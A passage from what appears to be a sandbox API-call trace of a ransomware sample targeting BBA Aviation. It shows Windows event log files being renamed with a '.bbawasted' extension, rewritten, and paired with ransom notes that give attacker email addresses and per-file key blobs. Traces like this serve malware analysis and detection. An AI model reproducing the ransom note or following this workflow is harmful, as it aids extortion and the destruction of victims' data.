KEY:\r\n[begin_key]kRtwgvL6Lu6XMqDjxtIIV6nHTg7SbnZ4swWyDfiXX9M8nCSjYLOTQodxf8Yq6Jtt\r\nzYYYuhhE09c8O4VoovrcfuJ5lHZigHlHchlTK5qiPEtBerj9sswAioObA/hXvpeO\r\nljTT5TBs1cERIM+vCx5x1MInTcs1XysSlSOiPedJmoE1TR6dO0mQCSR6xA2gT75X\r\narYcfWDo3+QAzfEVMELG16wn3AFjZtfYC72byYRkIv97vuC8gAYi4yeggFJ9UTiV\r\na+nPJDsOiYrvqZoFtQ4FcPTGDnEM82VLW7COWAD2TC7Rpylmea0rgC+6bpw2SxAF\r\nxiWjtLJgVoFdc75gxCm6ayyc1ZVDjAeAgdXG6qOA9Ic1ScO5N+wIyjPJe7Dr+wzc\r\ntgqn1WzYh7GfMUC+N/YWPYacYrbK624PMhl6vOtarfpVk+Ke2EeY36RkkaxU7mPB\r\nvjxLB6PcHL4P+yrAVSn44UgvEJJASZMVm69uQ0KzkgEBV2NmBkJgE/b1ulBwrDAI\r\ns+1ge7aRhJCgGROB+XdPMFNdJwge6TpB9DxeVRJUN2fgy20e7iD8syrsUIDuiFYP\r\nbkpq22R4H+2Rnfiu2dk1SYHz8mnGHaEEnbKOnQXayqav8IX+xD27HPf6YzkZWjgq\r\nF+UMnvoSUh4rEnVzgNqjWHnCcjJCvzUpI5RtS3ya/7u=[end_key]\r\nKEEP IT\r\n") returned 984 [0189.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0189.400] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0189.400] SetEndOfFile (hFile=0x28c) returned 1 [0189.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.403] CloseHandle (hObject=0x28c) returned 1 [0189.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0189.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9500 | out: hHeap=0x660000) returned 1 [0189.548] _aulldvrm () returned 0x0 [0189.548] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0189.549] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0189.549] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0189.549] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 59 [0189.549] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6aecf0 [0189.550] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0189.550] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.550] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6b48) returned 1 [0189.550] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0189.550] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0189.550] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0189.551] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0189.552] SetEndOfFile (hFile=0x28c) returned 1 [0189.553] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.553] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.553] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0189.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.bbawasted")) returned 1 [0189.555] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0189.555] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0189.555] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0189.555] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0189.556] CloseHandle (hObject=0x294) returned 1 [0189.589] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0189.590] CloseHandle (hObject=0x280) returned 1 [0189.590] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0189.590] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a62c8) returned 1 [0189.590] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0189.590] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0189.591] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6350) returned 1 [0189.591] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0189.591] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0189.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0189.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0189.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.602] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]do/JbsaTe3VOEKlh5rSlliN+7bfHjoZZZ8g0rJzyc+sdjsuf9odFuV98HntmLVCM\r\nDzYS2QpfXCBt3dM2kZgtk6NmY/6PXgZqYrJdKxd3b+NnBG74vt1VWu0506fmESV0\r\nn8YMDjWbwH6JWIXiJ9lTFEAgZjqQW+DYGSI4LztX1BDhesMxiupOqcIdV8knl2rO\r\nNGCPZvqdMDhE8TrdqXDElapRFvAE/PKkh/q42nY/9BM5t2E6+SzJL42hEab3EObR\r\nbIrJiIJSn0a6QFw8XR8wWiR7e1B2/U0SAp39lz3XEiuRbs21kOdgoaA6uyN2kU0T\r\nA2jLRmCdGwK4WcXOXi2wOOozjvB5vSzuGu4olVpGfzD8nk1tMTQF998mN3S/aV6m\r\nW4hZF2ZX1jFYFoGNwZwf/s15MY2hNyo5+AmQ0aen8Bsk6pEkQ3PYrnYMqL5ikRnQ\r\nest0GJJ4qJtmjxBcZAwmBikfqm3r+Mptom6SyeU7tWwUVF/XmBmhMAOsH07tPerE\r\nSLCmo6bFOWIEMtP8WVkUOAbFnemJh/1s6O3plOVrJRyI+7jtPJ/qfttDVsc/vAz6\r\nA/40cRBLXb3A3zP+3pIJ1Z7PMg+Kfck4I3lM8xoFhwxIsyhdh8Tsii5uKkJZTJCx\r\nBrjUp7mAkUlWeceOnXYTDhWEEZx3aM+wvVrD49+MOja=[end_key]\r\nKEEP IT\r\n") returned 984 [0189.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0189.603] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0189.603] SetEndOfFile (hFile=0x28c) returned 1 [0189.605] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.605] CloseHandle (hObject=0x28c) returned 1 [0189.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0189.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a95d0 | out: hHeap=0x660000) returned 1 [0189.608] _aulldvrm () returned 0x0 [0189.608] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0189.705] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0189.705] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0189.705] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 63 [0189.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x288) returned 0x6aecf0 [0189.705] lstrcpyW (in: lpString1=0x6aed6e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0189.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.705] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0189.706] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0189.706] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0189.706] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0189.707] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0189.709] SetEndOfFile (hFile=0x28c) returned 1 [0189.709] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.709] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.709] lstrcpyW (in: lpString1=0x6aed6e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0189.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.bbawasted")) returned 1 [0189.710] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0189.710] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0189.711] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0189.711] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0189.711] CloseHandle (hObject=0x280) returned 1 [0189.724] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0189.725] CloseHandle (hObject=0x294) returned 1 [0189.725] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0189.725] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a68a0) returned 1 [0189.726] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0189.726] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0189.726] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a68a0) returned 1 [0189.726] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0189.726] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0189.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0189.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0189.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.735] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]huiI3/7V7KAbD/gV5JFeWTAgnSKDdZzzrveZ0B+XtFJhVR0z1wICbMloqvoCic+j\r\n+H+B8VHHsCjtABGcRrq/iK1G+4vG7kzI8O8Ndw0hqF6eqHdNnamabwtAQ06lgJYJ\r\nm0Trv78QGJ4T5TtF2E2BlHYZHVehMRKIFgkPgu6xJBhU478NuigzBi4OjRsxo8Cn\r\n8X45E5CV0iJTlRT2Y10vvUHKeOHHpV3A8Zqbe2co2gMFOvktRLeNyuv7ii3R88ws\r\nSWnHy8GbpOUIQI74XDZPDXkNe4PbxbMRo/tIeeL/7gNPHe7FhvHUJK1yQscvriEe\r\nwaUuU54aKtbqC1noLHJk+9qdcT5dlbCVlJHc34kQcacnzz+9IHV/5acoPFpR6WJY\r\no2a4BVb79yrwMHxDPHqaZVipcv0VzvgBxzVEuqVVkDSoCCQn1sKKT+5n6Axeejit\r\nty4tTlSY3G7PfLFoXt1F6aq/fhErS/U+0HvK0mOznN0/OkpWYrJvdnOUyYZJKtib\r\nyNgo/wEwKwJvNFNFqFaBYCx00ksBWi+sh9zfP+OiInPTJWT2ZyitolY5Or374mOJ\r\npAopwIVRspFscVVZoXhp6tMrnEbWA7LlO/rSvr3H11HK1BEueExC6RtFRAJ/kEnF\r\ngIFuApJI4qXin8ya6IlEaa8V+JCatZ6vahww7NuyDDe=[end_key]\r\nKEEP IT\r\n") returned 984 [0189.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0189.735] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0189.736] SetEndOfFile (hFile=0x28c) returned 1 [0189.738] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.738] CloseHandle (hObject=0x28c) returned 1 [0189.744] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0189.744] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7fd8 | out: hHeap=0x660000) returned 1 [0189.744] _aulldvrm () returned 0x0 [0189.744] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6790) returned 1 [0189.745] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0189.745] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0189.745] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 61 [0189.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6aecf0 [0189.746] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0189.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.746] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6b48) returned 1 [0189.746] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0189.746] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0189.746] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0189.747] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0189.749] SetEndOfFile (hFile=0x28c) returned 1 [0189.749] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.749] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.749] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0189.749] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.bbawasted")) returned 1 [0189.851] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0189.851] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0189.852] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0189.852] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0189.852] CloseHandle (hObject=0x294) returned 1 [0189.862] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0189.862] CloseHandle (hObject=0x280) returned 1 [0189.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0189.863] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0189.863] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0189.863] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0189.864] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0189.864] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0189.864] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0189.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0189.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0189.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.875] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Yfi0P2UAqY6gfPfdMNn6QsPPVkJwvW1qyZVSywiYgCHZQMeYa2dQI9p6uSnqHhQx\r\nHM27SCK8OuBTCS5fLvdlJBPLBFZJmLPgireXqEA8D8NaigLxg60hR/hUAa7jCf6r\r\neX6DNFCrxr+uUa5yhq8KMtcEqsaZ6dJVGpAzP0Ywidq/VFErgRoPgJmRM/4qjtMe\r\n2yvIt2FfTmx0WR/13dJbN7RiDOCO79xwDIZUO52neW8fQKjDulQ01D9KGuDQFqo6\r\nt9QaQkL7C8i2BlNVSGFZ5ZvW3UaMFwCmvS5YctZcicXDHC1ZJSDoDvsITdn0pU5Q\r\ndqo+Dp2NjlFKz8euZM1FbaxWdTgZA5sVDYrqsOMxSPbx6Sqnen+SRm1cTk1wzCwJ\r\nE/LAc8YQU8BVaOd9eiI0V7vXk7HdK5R01ucUKjUVa+JzZ3gjwIrsj6gBm9d1gf3C\r\nsuESTdhzd+p39RUE+SYaV64fGxhI5ywP2VnTlwAsKklaGhenZ4DuS1gAudMsN9c9\r\n9Y5MTDB5/YDnwMQchjEknxmdm9jRFYvacL3fl5hhFNH5hiiscLmItkr0W2ZduqTT\r\nXBwq7yDT4hj27lyAAdPkKvqSEPc/kXxW/8b3yJZGJpbh/7kgLxkqrFL/YGqsZ8/5\r\nqYseWSBXN42qAC8GY0H4JR2xPdgsNhtG/uwqHedkdUZ=[end_key]\r\nKEEP IT\r\n") returned 984 [0189.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0189.875] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0189.876] SetEndOfFile (hFile=0x28c) returned 1 [0189.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.878] CloseHandle (hObject=0x28c) returned 1 [0189.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0189.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7840 | out: hHeap=0x660000) returned 1 [0189.884] _aulldvrm () returned 0x0 [0189.884] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6928) returned 1 [0189.885] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0189.885] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0189.885] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 59 [0189.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6aecf0 [0189.885] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" 